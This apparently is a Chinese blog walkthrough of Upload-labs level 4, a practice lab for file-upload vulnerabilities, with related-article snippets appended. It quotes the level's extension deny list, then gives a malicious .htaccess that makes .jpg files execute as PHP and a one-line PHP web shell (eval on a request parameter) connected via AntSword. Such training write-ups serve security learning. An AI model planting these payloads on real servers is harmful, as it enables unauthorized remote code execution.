Upload-labs第四关

最新推荐文章于 2024-10-11 23:45:00 发布
最新推荐文章于 2024-10-11 23:45:00 发布
阅读量228 收藏
点赞数 6
文章标签: android 网络安全 安全 系统安全 web安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNRomance/article/details/142852198
版权

本次考验的是黑名单绕过,查看禁用的文件如下:

  $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".

我们可以尝试.htaccess绕过,查看Apache文件存在 AllowOverride All,那么我们可以上传自己构造的恶意htaccess覆盖掉之前的配置文件,从而绕过黑名单限制。

DocumentRoot  "C:\phpstudy\WWW"
<Directory />
    Options +Indexes +FollowSymLinks +ExecCGI
    AllowOverride All
    Order allow,deny
    Allow from all
    Require all granted
</Directory>

首先上传.htaccess文件
创建.htaccess文件,编辑如下

#以下代码目的:
设置所有的jpg格式的文件以php格式执行

<FilesMatch "\.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>

以下代码目的:设置muma.jpg文件以php格式执行

<FilesMatch "muma.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>

示例:
在这里插入图片描述
上传一个phpinfo,看是否成功:

<?php phpinfo();?>

访问文件地址:
在这里插入图片描述
写入一句话木马,修改文件后缀为.jpg:

<?php eval($_REQUEST[123])?>

蚁剑连接:
在这里插入图片描述

ccino .
关注
upload-labs第四教程
Estera的博客
06-06 719
upload-labs第四教程
upload-labs 第四攻略】
m0_71635484的博客
02-23 716
upload-labs第四
文件上传upload-labs第四
你的小粉丝的博客
10-13 3715
作为一个小白,还是直接看提示吧… 过滤了很多后缀文件,但是没有过滤.htaccess文件,可以重写文件解析规则绕过,上传一个.htaccess
upload-labs第一教程
Estera的博客
06-03 722
upload-labs第一
upload-labs 第四-第九方法
qq_62673514的博客
02-23 1117
upload-labs 第四-第九方法
upload-labs第五教程
Estera的博客
06-07 2017
php.ini是php的全局配置文件,对整个web服务起作用,.user.ini和.htaccess都是目录的配置文件,.user.ini是用户自定义的php.ini,通常构造后门和隐藏后门。自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGISAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htaccess 文件有同样效果。
upload-labs第14
Estera的博客
06-21 776
在windows上创建图片码。15、16和14是一样的。
upload-labs第三教程
Estera的博客
06-05 612
upload-labs第三教程
upload-labs第六教程
Estera的博客
06-10 499
upload-labs第六教程及500错误解决方法
upload-labs第九教程
Estera的博客
06-11 481
备用数据流(Alternate Data Streams,ADS)是Windows中的一个特性,它允许在一个文件中隐藏额外的信息。这个特性是NTFS(Windows常用的一种文件系统)独有的。可以这样想:可以把备用数据流想象成一本书中的“隐形笔记”。这本书(文件)看起来还是那本书,里面的主要内容没有变,但你可以在书页的空白处(备用数据流)用隐形墨水写一些额外的内容(数据流),只有知道方法的人才能看到这些内容。
上传文件漏洞靶场upload-labs
09-27
总的来说,`upload-labs`靶场提供了一个理想的环境,让你在安全的环境中实践和掌握上传文件漏洞相的知识,这对于提升你的Web安全技能至重要。通过深入研究和实践,你将能够更好地保护自己和他人的网站免受此类...
upload-labs19-20以及总结1
08-08
4. **黑名单过滤的局限性**:黑名单过滤策略往往容易被绕过,因为它依赖于完全匹配特定的扩展名。在这种情况下,大小写不敏感和文件内容验证的缺失导致了安全漏洞。 5. **00截断**:在某些环境中,文件名中包含"00...
在 Windows 11 安卓子系统中安装 APK 的操作指南
ailbj的博客
10-11 170
本指南旨在帮助用户在 Windows 11 上安装并运行带有 Google 框架的原生 Android 环境中的 APK。如果网络设置导致连通性检测失败,可能会出现“VirtWifi的连接受限”的提示。这样设置后,即使闭所有应用窗口,WSA 也会继续运行,防止代理中断。安卓子系统上成功安装和运行带有 Google 框架的 APK。直接在已安装的 WSA 子系统中安装所需的代理应用程序。软件中好像有网络功能,不过无论如何,以下内容不是必要的。
Android Framework AMS(05)startActivity分析-2(ActivityThread启动到Activity拉起)
wangdsh的博客
10-11 551
说明:本章节主要解读AMS通过startActivity启动Activity的整个流程的整个流程的第二阶段:从ActivityThread启动到Activity拉起。Android Framework AMS(04)startActivity分析-1(am启动到ActivityThread启动)
PHP简单登录系统
2301_79431343的博客
10-08 926
这是注销过程的第一步,确保会话中的所有数据都被清除。函数会删除服务器端与会话相的文件或数据库记录,但不会删除客户端的Cookie(这就是为什么前面需要使用。:这是一个属性,用来联标签与具体的表单控件。函数创建一个过期的Cookie,其名称与会话名称相同,有效期设置为过去的某个时间点(函数开始一个新的会话或者重新启动一个已存在的会话。:这是一个标签元素,用于为表单中的输入字段提供描述性的标签。这行代码开始一个新的会话或者恢复一个已经存在的会话。:定义了两个输入字段,一个是用户名,一个是密码。
20241004给荣品RD-RK3588-AHD开发板刷Rockchip原厂的Android12【HDMI0显示】
南岭笑笑生之家
10-04 1842
Z:\82临时了evb4+rp3588s_android12\kernel-5.10\arch\arm64\boot\dts\rockchip\rd-rk3588s-AHD.dts。Z:\82临时了evb4+rp3588s_android12\kernel-5.10\arch\arm64\boot\dts\rockchip\rp-lcd-hdmi0.dtsi。1、配置RK3588S的默认DTS为:rk3588s-evb4-lp4x-v10.dts。【Android12需要】配置为默认HDMI0显示。
Android app 上线google商店 sdk 需要升级到34 遇到 Android Gradle build error
qq_37069091的博客
10-11 115
笔记
20241004给荣品RD-RK3588-AHD开发板刷Rockchip原厂的Android12时永不休眠的步骤
南岭笑笑生之家
10-04 1346
20241004给荣品RD-RK3588-AHD开发板刷Rockchip原厂的Android12时永不休眠的步骤。【可以/可选尝试在DTS配置suspend的状态为:disabled】切换到dream_timeout资源,这里边有永不休眠的选项;RK3588-ANDROID12-永不息屏,不锁屏。Android11 设置菜单添加永不休眠选项。3、【改两个地方,但是只修改这里无效!RK3568-ANDROID11-不息屏。rk平台Android12屏幕永不休眠。
Android JNI调用.c文件
最新发布
码点
10-11 40
1.创建Android项目,创建一个jni目录来存放.c代码。Android JNI调用.c文件。
upload-labs第四
04-12
upload-labs是一个用于学习和练习Web安全的在线平台,第四是一个文件上传漏洞的挑战。在这个卡中,你需要通过绕过文件类型检查,成功上传一个恶意的PHP文件。 具体步骤如下: 1. 打开upload-labs平台,并选择第四。 2. 你会看到一个文件上传的表单,可以选择一个文件并点击上传按钮。 3. 首先,尝试上传一个普通的PHP文件,比如test.php。如果上传成功并且可以访问该文件,说明存在文件类型检查漏洞。 4. 如果上传失败或者无法访问上传的PHP文件,说明存在文件类型检查。这时,你需要绕过文件类型检查。 5. 一种常见的绕过方法是修改文件的扩展名。尝试将test.php改为test.php.jpg或者test.php.png,并重新上传。 6. 如果上传成功并且可以访问该文件,说明成功绕过了文件类型检查。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值